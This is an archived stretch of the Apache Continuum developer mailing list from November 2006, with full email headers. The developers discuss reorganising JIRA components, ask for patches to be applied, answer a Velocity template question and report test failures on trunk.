b=cZ85xUYHU8nWFiI2uzoOewa+DkF1HJFVIcJuFEoxzUTxS4LYUGLrsWSx7wu+JmdUnpZIU/AS/E6emSI0oICEcjLX/j01+d+I+/l+nDH6hU2xgJ7TDxX97kJuFRdpJSqeK0RUx4pEF0RDgOJR6bLNpGt1N6xEYtzsixVxJWvjgcI= Received: by 161.129.204.104 with SMTP id z6mr2936135huc.1163187712219; Fri, 10 Nov 2006 11:41:52 -0800 (PST) Received: by 161.129.204.104 with HTTP; Fri, 10 Nov 2006 11:41:51 -0800 (PST) Message-ID: <[email protected]> Date: Fri, 10 Nov 2006 13:41:51 -0600 From: "Jesse McConnell" <[email protected]> To: [email protected] Subject: Re: jira components In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org well thats a little more verbose then I was looking for, I was thinking we could shove all the tool integration stuff together, and all the notifiers together. I was envisioning Core system 80 Database 16 Documentation 12 Tool Integration Notification 5 SCM 18 Web UI 89 Web Security 0 Web Groups 13 Web Projects 9 Web Configuration 2 XMLRPC Interface 12 No Component 61 Web seems to be the noisiest so breaking it out a bit might help, but the others could be consolidated to make it easier for people assigning issues initially to hit the right side of the right barn. jesse On 11/10/06, Joakim Erdfelt <[email protected]> wrote: > Breaking apart the notifiers are a good idea. > However, due to natural language sort, they are not grouped very > efficiently. > > How about "Notifier ___" instead? > > So, expanding your ideas to a the eventual list, we wind up with ... > > Core system 80 > Database 16 > Documentation 12 > Integration M2 0 > Integration M1 0 > Integration Ant 0 > Integration Shell 0 > Notification Subsystem 5 > Notifier (AOL) 1 > Notifier (IRC) 3 > Notifier (Jabber) 3 > Notifier (Mail) 14 > Notifier (MSN) 2 > Notifier (Wagon) 0 > Project Grouping 1 > SCM 18 > Web UI 89 > Web Security 0 > Web Groups 13 > Web Projects 9 > Web Configuration 2 > XMLRPC Interface 12 > No Component 61 > > Looks detailed. ;-) > > - Joakim > > Jesse McConnell wrote: > > The current components in jira are (with current # of categoried issues): > > > > AOL Notifier 1 > > Core system 80 > > Database 16 > > Documentation 12 > > IRC Notifier 3 > > Jabber Notifier 3 > > Mail Notifier 14 > > MSN Notifier 2 > > Notification 5 > > Project Grouping 1 > > SCM 18 > > Web interface 107 > > XMLRPC Interface 12 > > No Component 61 > > > > > > I would like to propose reorganizing these a little bit, combining all > > of the Notifiers into the Notification component. Also add a > > component for the different integrations for issues related to > > Ant/Shell/M1 and M2 integrations, I think they are currently mostly > > getting split out between Web Interface and Core system. > > > > We also might be well served by breaking out the web interface into > > components: Web - Security, Web - Notification, Web - Groups, Web - > > Projects, Web - Other. > > > > thoughts? > > > > jesse > > > > > > > > -- jesse mcconnell [email protected] From [email protected] Fri Nov 10 22:21:00 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73337 invoked from network); 10 Nov 2006 22:20:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 10 Nov 2006 22:20:59 -0000 Received: (qmail 69360 invoked by uid 500); 10 Nov 2006 22:21:10 -0000 Delivered-To: [email protected] Received: (qmail 69338 invoked by uid 500); 10 Nov 2006 22:21:09 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 69327 invoked by uid 99); 10 Nov 2006 22:21:09 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 10 Nov 2006 14:21:09 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO customer-domains.icp-qv1-irony10.iinet.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 10 Nov 2006 14:20:56 -0800 Received: from 203-158-38-82.dyn.iinet.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by customer-domains.icp-qv1-irony10.iinet.net.au with ESMTP; 11 Nov 2006 06:20:32 +0800 X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AgAAAHKIVEXLniZSdGdsb2JhbAAN X-IronPort-AV: i="4.09,411,1157299200"; d="scan'208"; a="28265194:sNHT217688796" Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Brett Porter <[email protected]> Subject: Re: jira components Date: Sat, 11 Nov 2006 09:20:29 +1100 To: [email protected] X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org I think breaking out the tools and notifiers is a good idea. They are actually the *easiest* ones for people to hit because they know which specific one they are using. How about breaking up core system into scheduling, etc? Also, is there anything in those 61 no components that should be a new component? - Brett On 11/11/2006, at 6:41 AM, Jesse McConnell wrote: > well thats a little more verbose then I was looking for, I was > thinking we could shove all the tool integration stuff together, and > all the notifiers together. I was envisioning > > > Core system 80 > Database 16 > Documentation 12 > Tool Integration > Notification 5 > SCM 18 > Web UI 89 > Web Security 0 > Web Groups 13 > Web Projects 9 > Web Configuration 2 > XMLRPC Interface 12 > No Component 61 > > Web seems to be the noisiest so breaking it out a bit might help, but > the others could be consolidated to make it easier for people > assigning issues initially to hit the right side of the right barn. > > jesse > > > > On 11/10/06, Joakim Erdfelt <[email protected]> wrote: >> Breaking apart the notifiers are a good idea. >> However, due to natural language sort, they are not grouped very >> efficiently. >> >> How about "Notifier ___" instead? >> >> So, expanding your ideas to a the eventual list, we wind up with ... >> >> Core system 80 >> Database 16 >> Documentation 12 >> Integration M2 0 >> Integration M1 0 >> Integration Ant 0 >> Integration Shell 0 >> Notification Subsystem 5 >> Notifier (AOL) 1 >> Notifier (IRC) 3 >> Notifier (Jabber) 3 >> Notifier (Mail) 14 >> Notifier (MSN) 2 >> Notifier (Wagon) 0 >> Project Grouping 1 >> SCM 18 >> Web UI 89 >> Web Security 0 >> Web Groups 13 >> Web Projects 9 >> Web Configuration 2 >> XMLRPC Interface 12 >> No Component 61 >> >> Looks detailed. ;-) >> >> - Joakim >> >> Jesse McConnell wrote: >> > The current components in jira are (with current # of categoried >> issues): >> > >> > AOL Notifier 1 >> > Core system 80 >> > Database 16 >> > Documentation 12 >> > IRC Notifier 3 >> > Jabber Notifier 3 >> > Mail Notifier 14 >> > MSN Notifier 2 >> > Notification 5 >> > Project Grouping 1 >> > SCM 18 >> > Web interface 107 >> > XMLRPC Interface 12 >> > No Component 61 >> > >> > >> > I would like to propose reorganizing these a little bit, >> combining all >> > of the Notifiers into the Notification component. Also add a >> > component for the different integrations for issues related to >> > Ant/Shell/M1 and M2 integrations, I think they are currently mostly >> > getting split out between Web Interface and Core system. >> > >> > We also might be well served by breaking out the web interface into >> > components: Web - Security, Web - Notification, Web - Groups, Web - >> > Projects, Web - Other. >> > >> > thoughts? >> > >> > jesse >> > >> > >> > >> >> > > > -- > jesse mcconnell > [email protected] From [email protected] Sat Nov 11 00:59:46 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 18241 invoked from network); 11 Nov 2006 00:59:45 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Nov 2006 00:59:45 -0000 Received: (qmail 66143 invoked by uid 500); 11 Nov 2006 00:59:56 -0000 Delivered-To: [email protected] Received: (qmail 66010 invoked by uid 500); 11 Nov 2006 00:59:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 65999 invoked by uid 99); 11 Nov 2006 00:59:55 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 10 Nov 2006 16:59:55 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nf-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 10 Nov 2006 16:59:42 -0800 Received: by nf-out-0910.google.com with SMTP id l24so1283804nfc for <[email protected]>; Fri, 10 Nov 2006 16:59:21 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=jelSWSDIDwM/Ag4sG/Foa+3JyZWasFSCf2iwBIpZPM2dGiByCO6ULb0asQbzNbpcQfJ4DNLfO954hqN65GdJwmVEAVEgEjIQosDX6jZ0YOCxVBaHV8LOrl2qZM384JjR2bh4mIgn2k0qq+E680+UUpdj/Rqi+w45DDojxoTAYRQ= Received: by 161.129.204.104 with SMTP id a15mr3284403hud.1163206760995; Fri, 10 Nov 2006 16:59:20 -0800 (PST) Received: by 161.129.204.104 with HTTP; Fri, 10 Nov 2006 16:59:20 -0800 (PST) Message-ID: <[email protected]> Date: Fri, 10 Nov 2006 18:59:20 -0600 From: "Jesse McConnell" <[email protected]> To: [email protected] Subject: Re: jira components In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org well, when you look at it like that... ok, I'll do that this weekend and try and get a home for those poor 61 lonely issues :) jesse On 11/10/06, Brett Porter <[email protected]> wrote: > I think breaking out the tools and notifiers is a good idea. They are > actually the *easiest* ones for people to hit because they know which > specific one they are using. > > How about breaking up core system into scheduling, etc? Also, is > there anything in those 61 no components that should be a new component? > > - Brett > > On 11/11/2006, at 6:41 AM, Jesse McConnell wrote: > > > well thats a little more verbose then I was looking for, I was > > thinking we could shove all the tool integration stuff together, and > > all the notifiers together. I was envisioning > > > > > > Core system 80 > > Database 16 > > Documentation 12 > > Tool Integration > > Notification 5 > > SCM 18 > > Web UI 89 > > Web Security 0 > > Web Groups 13 > > Web Projects 9 > > Web Configuration 2 > > XMLRPC Interface 12 > > No Component 61 > > > > Web seems to be the noisiest so breaking it out a bit might help, but > > the others could be consolidated to make it easier for people > > assigning issues initially to hit the right side of the right barn. > > > > jesse > > > > > > > > On 11/10/06, Joakim Erdfelt <[email protected]> wrote: > >> Breaking apart the notifiers are a good idea. > >> However, due to natural language sort, they are not grouped very > >> efficiently. > >> > >> How about "Notifier ___" instead? > >> > >> So, expanding your ideas to a the eventual list, we wind up with ... > >> > >> Core system 80 > >> Database 16 > >> Documentation 12 > >> Integration M2 0 > >> Integration M1 0 > >> Integration Ant 0 > >> Integration Shell 0 > >> Notification Subsystem 5 > >> Notifier (AOL) 1 > >> Notifier (IRC) 3 > >> Notifier (Jabber) 3 > >> Notifier (Mail) 14 > >> Notifier (MSN) 2 > >> Notifier (Wagon) 0 > >> Project Grouping 1 > >> SCM 18 > >> Web UI 89 > >> Web Security 0 > >> Web Groups 13 > >> Web Projects 9 > >> Web Configuration 2 > >> XMLRPC Interface 12 > >> No Component 61 > >> > >> Looks detailed. ;-) > >> > >> - Joakim > >> > >> Jesse McConnell wrote: > >> > The current components in jira are (with current # of categoried > >> issues): > >> > > >> > AOL Notifier 1 > >> > Core system 80 > >> > Database 16 > >> > Documentation 12 > >> > IRC Notifier 3 > >> > Jabber Notifier 3 > >> > Mail Notifier 14 > >> > MSN Notifier 2 > >> > Notification 5 > >> > Project Grouping 1 > >> > SCM 18 > >> > Web interface 107 > >> > XMLRPC Interface 12 > >> > No Component 61 > >> > > >> > > >> > I would like to propose reorganizing these a little bit, > >> combining all > >> > of the Notifiers into the Notification component. Also add a > >> > component for the different integrations for issues related to > >> > Ant/Shell/M1 and M2 integrations, I think they are currently mostly > >> > getting split out between Web Interface and Core system. > >> > > >> > We also might be well served by breaking out the web interface into > >> > components: Web - Security, Web - Notification, Web - Groups, Web - > >> > Projects, Web - Other. > >> > > >> > thoughts? > >> > > >> > jesse > >> > > >> > > >> > > >> > >> > > > > > > -- > > jesse mcconnell > > [email protected] > -- jesse mcconnell [email protected] From [email protected] Mon Nov 13 10:49:24 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 35784 invoked from network); 13 Nov 2006 10:49:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 13 Nov 2006 10:49:23 -0000 Received: (qmail 92770 invoked by uid 500); 13 Nov 2006 10:49:34 -0000 Delivered-To: [email protected] Received: (qmail 92751 invoked by uid 500); 13 Nov 2006 10:49:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 27813 invoked by uid 99); 13 Nov 2006 10:00:02 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Message-ID: <[email protected]> Date: Mon, 13 Nov 2006 17:59:06 +0800 From: Maria Odea Ching <[email protected]> User-Agent: Mozilla Thunderbird 0.9 (Windows/20041103) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Request to apply patch for CONTINUUM-977 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Hi, Can anyone please apply the patch that I've submitted for http://jira.codehaus.org/browse/CONTINUUM-977? Thanks in advance :) - Deng From [email protected] Sat Nov 18 08:52:29 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 56562 invoked from network); 18 Nov 2006 08:52:28 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Nov 2006 08:52:28 -0000 Received: (qmail 13081 invoked by uid 500); 18 Nov 2006 08:52:37 -0000 Delivered-To: [email protected] Received: (qmail 13058 invoked by uid 500); 18 Nov 2006 08:52:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 13047 invoked by uid 99); 18 Nov 2006 08:52:37 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 18 Nov 2006 00:52:37 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.maven.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 18 Nov 2006 00:52:22 -0800 Received: (qmail 30007 invoked by uid 89); 18 Nov 2006 08:52:00 -0000 Received: from unknown (HELO ?jR?????IPvacf:4db6:5e0b:f386:43a5:35d7:718d:3c8b:1?) ([email protected]@161.129.204.104) by mail.maven.org with ESMTPA; 18 Nov 2006 08:52:00 -0000 Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Jason van Zyl <[email protected]> Subject: Re: svn commit: r474987 - in /maven/continuum/trunk/continuum-core: ./ src/main/java/org/apache/maven/continuum/ src/main/java/org/apache/maven/continuum/build/settings/ src/main/java/org/apache/maven/continuum/buildcontroller/ src/main/java/org/apache/mav... Date: Sat, 18 Nov 2006 03:51:55 -0500 To: [email protected] X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org On 14 Nov 06, at 4:22 PM 14 Nov 06, [email protected] wrote: > Author: jmcconnell > Date: Tue Nov 14 13:21:59 2006 > New Revision: 474987 > > URL: http://svn.apache.org/viewvc?view=rev&rev=474987 > Log: > continuum-758 converted continuum-core over to use the plexus-maven- > plugin where it can in generation of the components.xml and then a > merge with the components can can't be totally configured that > way. This tore a lot of the meat out of the existing > components.xml and should make working with the settings we need to > manage with it a lot easier. I commented where the components that > are in continuum-core that couldn't be configured with the plugin > in the components.xml file that we are merging in. > Nice! Jason. From [email protected] Sat Nov 18 11:46:46 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 6783 invoked from network); 18 Nov 2006 11:46:46 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Nov 2006 11:46:46 -0000 Received: (qmail 10050 invoked by uid 500); 18 Nov 2006 11:46:54 -0000 Delivered-To: [email protected] Received: (qmail 10032 invoked by uid 500); 18 Nov 2006 11:46:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 10021 invoked by uid 99); 18 Nov 2006 11:46:54 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 18 Nov 2006 03:46:54 -0800 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO py-out-1112.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 18 Nov 2006 03:46:39 -0800 Received: by py-out-1112.google.com with SMTP id u77so668442pyb for <[email protected]>; Sat, 18 Nov 2006 03:46:18 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:mime-version:content-type; b=aEvKfN3OuZt7kwbvT0GDYmrFpf4BkhBkq/kQtk9W6FBjg/yF0wzpUEbRnkLKcd16zrGeeiGMyrDhkKh7PL0DIuTsMm3JI+mvV2vclV2qiK0rZpOHz6w7yhv1luQXmT1C/936buDTdA0Cu6e/nxDeRIuQU7LuB9YKPLvi6D5ukuY= Received: by 161.129.204.104 with SMTP id f1mr4012995pym.1163850378663; Sat, 18 Nov 2006 03:46:18 -0800 (PST) Received: by 161.129.204.104 with HTTP; Sat, 18 Nov 2006 03:46:18 -0800 (PST) Message-ID: <[email protected]> Date: Sat, 18 Nov 2006 09:46:18 -0200 From: "=?ISO-8859-1?Q?Lucas_Gon=E7alves?=" <[email protected]> To: [email protected] Subject: Understand architeture of Continuum MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_16241_9049157.1163850378562" X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_16241_9049157.1163850378562 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: quoted-printable Content-Disposition: inline Does View tag in components.xml represente what will be avaliable in next Velocity Template? exemple: in ProjectBuilds.vm i call my new page, deploy.vm $link.setPage('deploy.vm ').addQueryData('view','Deploy').addQueryData('id',$project.id) I declared in components.xml a view 'Deploy' with scalar 'project' and expression "getProject(#id)" But in my new deploy.vm when i use $project.id it doesn't exist in velocity context. --=20 Lucas Gon=E7alves Tel: 475-205-1887 ------=_Part_16241_9049157.1163850378562-- From [email protected] Mon Nov 20 11:15:05 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 8070 invoked from network); 20 Nov 2006 11:15:04 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Nov 2006 11:15:04 -0000 Received: (qmail 64136 invoked by uid 500); 20 Nov 2006 11:15:14 -0000 Delivered-To: [email protected] Received: (qmail 64107 invoked by uid 500); 20 Nov 2006 11:15:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 715 invoked by uid 99); 20 Nov 2006 07:48:29 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Message-ID: <[email protected]> Date: Mon, 20 Nov 2006 15:46:59 +0800 From: Maria Odea Ching <[email protected]> User-Agent: Mozilla Thunderbird 0.9 (Windows/20041103) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Request to apply patch for CONTINUUM-1005 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Hi, Can anyone please apply the patch that I've submitted for http://jira.codehaus.org/browse/CONTINUUM-1005? The patch needs to be applied in plexus-security trunk. Thanks in advance! :-) - Deng From [email protected] Tue Nov 21 08:20:41 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 49885 invoked from network); 21 Nov 2006 08:20:40 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Nov 2006 08:20:40 -0000 Received: (qmail 7992 invoked by uid 500); 21 Nov 2006 08:20:50 -0000 Delivered-To: [email protected] Received: (qmail 7968 invoked by uid 500); 21 Nov 2006 08:20:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 7957 invoked by uid 99); 21 Nov 2006 08:20:49 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 21 Nov 2006 00:20:49 -0800 X-ASF-Spam-Status: No, hits=3.2 required=10.0 tests=RCVD_IN_BL_SPAMCOP_NET,RCVD_IN_SORBS_WEB,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO chandler.sharp.fm) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 21 Nov 2006 00:20:36 -0800 Received: from chandler.sharp.fm (localhost [161.129.204.104]) by chandler.sharp.fm (Postfix) with ESMTP id A3F94E538F for <[email protected]>; Tue, 21 Nov 2006 02:20:12 -0600 (CST) Received: from [161.129.204.104] (mtngprs7.mtn.co.za [161.129.204.104]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (Client did not present a certificate) by chandler.sharp.fm (Postfix) with ESMTP id 06F8FE538E for <[email protected]>; Tue, 21 Nov 2006 02:20:06 -0600 (CST) Message-ID: <[email protected]> Date: Tue, 21 Nov 2006 10:19:58 +0200 From: Graham Leggett <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Macintosh/20061025) MIME-Version: 1.0 To: [email protected] Subject: Continuum trunk test failures Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms040502000601060604090009" X-Virus-Scanned: ClamAV using ClamSMTP X-Virus-Checked: Checked by ClamAV on apache.org --------------ms040502000601060604090009 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Hi all, The current continuum trunk is failing the build with test failues: Results : Tests run: 35, Failures: 0, Errors: 5, Skipped: 0 [INFO] ------------------------------------------------------------------------ [ERROR] BUILD FAILURE [INFO] ------------------------------------------------------------------------ [INFO] There are test failures. I can't seem to find where the failure is though :( Regards, Graham -- --------------ms040502000601060604090009 Content-Type: application/x-pkcs7-signature; name="smime.p7s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="smime.p7s" Content-Description: S/MIME Cryptographic Signature MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIJNTCC AvUwggJeoAMCAQICEHPerLP+yWp/U+jCFAQ0kGwwDQYJKoZIhvcNAQEFBQAwYjELMAkGA1UE BhMCWkExJTAjBgNVBAoTHFRoYXd0ZSBDb25zdWx0aW5nIChQdHkpIEx0ZC4xLDAqBgNVBAMT I1RoYXd0ZSBQZXJzb25hbCBGcmVlbWFpbCBJc3N1aW5nIENBMB4XDTA2MDkyNzA5MDgxMloX DTA3MDkyNzA5MDgxMlowXTEQMA4GA1UEBBMHTGVnZ2V0dDEPMA0GA1UEKhMGR3JhaGFtMRcw FQYDVQQDEw5HcmFoYW0gTGVnZ2V0dDEfMB0GCSqGSIb3DQEJARYQbWluZnJpbkBzaGFycC5m bTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMJQ9lruxyjmdilORMEwQnd+ZdrC XSh5TZ/Tn/KQwFsH1ZYivHBF/lRFuy/X6AGq9EKmFI0kORoqZeatkEAZ5ocajDFxa7I8o8yk DRJUJT9Iw0eCD4omrt4Ua+xsegLvVT2Neq0txvijDLuVsheVMi4l4+g3W2C1yPHgobZ3eIno wyVyrTbPUbsSmilNpkjEEJOr0qnTEbf4FX8Qapd9Jm59vPfcqooKdiY9uDPp00nwbb1xFDtN oQikIAihFVX+EzAbhR78AGPPbDyxn9uExjfOQT46JsCaZu54VI91YLF8EgQTD8DyWe7ZiMfw jqP2Ro1ALmS+VLFOU4LNfFbzaVUCAwEAAaMtMCswGwYDVR0RBBQwEoEQbWluZnJpbkBzaGFy cC5mbTAMBgNVHRMBAf8EAjAAMA0GCSqGSIb3DQEBBQUAA4GBALHl5riB6yi4w7SD9AWr7FJq AKQ5ICk/A3xRr3l+ZHw5ZLO2uFMgT2ZKiORLAkhsqVjGhsEZgXG1BEc/Pk9B3mCYYu6nyB0n rRUzR7RVeOkOVqG8qBhZ4z/ItQAxHLk30g7S7QNbuTCeWqVVXxcaXmeBvC67s/OQICyRIFRg aKtJMIIC9TCCAl6gAwIBAgIQc96ss/7Jan9T6MIUBDSQbDANBgkqhkiG9w0BAQUFADBiMQsw CQYDVQQGEwJaQTElMCMGA1UEChMcVGhhd3RlIENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoG A1UEAxMjVGhhd3RlIFBlcnNvbmFsIEZyZWVtYWlsIElzc3VpbmcgQ0EwHhcNMDYwOTI3MDkw ODEyWhcNMDcwOTI3MDkwODEyWjBdMRAwDgYDVQQEEwdMZWdnZXR0MQ8wDQYDVQQqEwZHcmFo YW0xFzAVBgNVBAMTDkdyYWhhbSBMZWdnZXR0MR8wHQYJKoZIhvcNAQkBFhBtaW5mcmluQHNo YXJwLmZtMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwlD2Wu7HKOZ2KU5EwTBC d35l2sJdKHlNn9Of8pDAWwfVliK8cEX+VEW7L9foAar0QqYUjSQ5Gipl5q2QQBnmhxqMMXFr sjyjzKQNElQlP0jDR4IPiiau3hRr7Gx6Au9VPY16rS3G+KMMu5WyF5UyLiXj6DdbYLXI8eCh tnd4iejDJXKtNs9RuxKaKU2mSMQQk6vSqdMRt/gVfxBql30mbn2899yqigp2Jj24M+nTSfBt vXEUO02hCKQgCKEVVf4TMBuFHvwAY89sPLGf24TGN85BPjomwJpm7nhUj3VgsXwSBBMPwPJZ 7tmIx/COo/ZGjUAuZL5UsU5Tgs18VvNpVQIDAQABoy0wKzAbBgNVHREEFDASgRBtaW5mcmlu QHNoYXJwLmZtMAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQEFBQADgYEAseXmuIHrKLjDtIP0 BavsUmoApDkgKT8DfFGveX5kfDlks7a4UyBPZkqI5EsCSGypWMaGwRmBcbUERz8+T0HeYJhi 7qfIHSetFTNHtFV46Q5WobyoGFnjP8i1ADEcuTfSDtLtA1u5MJ5apVVfFxpeZ4G8Lruz85Ag LJEgVGBoq0kwggM/MIICqKADAgECAgENMA0GCSqGSIb3DQEBBQUAMIHRMQswCQYDVQQGEwJa QTEVMBMGA1UECBMMV2VzdGVybiBDYXBlMRIwEAYDVQQHEwlDYXBlIFRvd24xGjAYBgNVBAoT EVRoYXd0ZSBDb25zdWx0aW5nMSgwJgYDVQQLEx9DZXJ0aWZpY2F0aW9uIFNlcnZpY2VzIERp dmlzaW9uMSQwIgYDVQQDExtUaGF3dGUgUGVyc29uYWwgRnJlZW1haWwgQ0ExKzApBgkqhkiG 9w0BCQEWHHBlcnNvbmFsLWZyZWVtYWlsQHRoYXd0ZS5jb20wHhcNMDMwNzE3MDAwMDAwWhcN MTMwNzE2MjM1OTU5WjBiMQswCQYDVQQGEwJaQTElMCMGA1UEChMcVGhhd3RlIENvbnN1bHRp 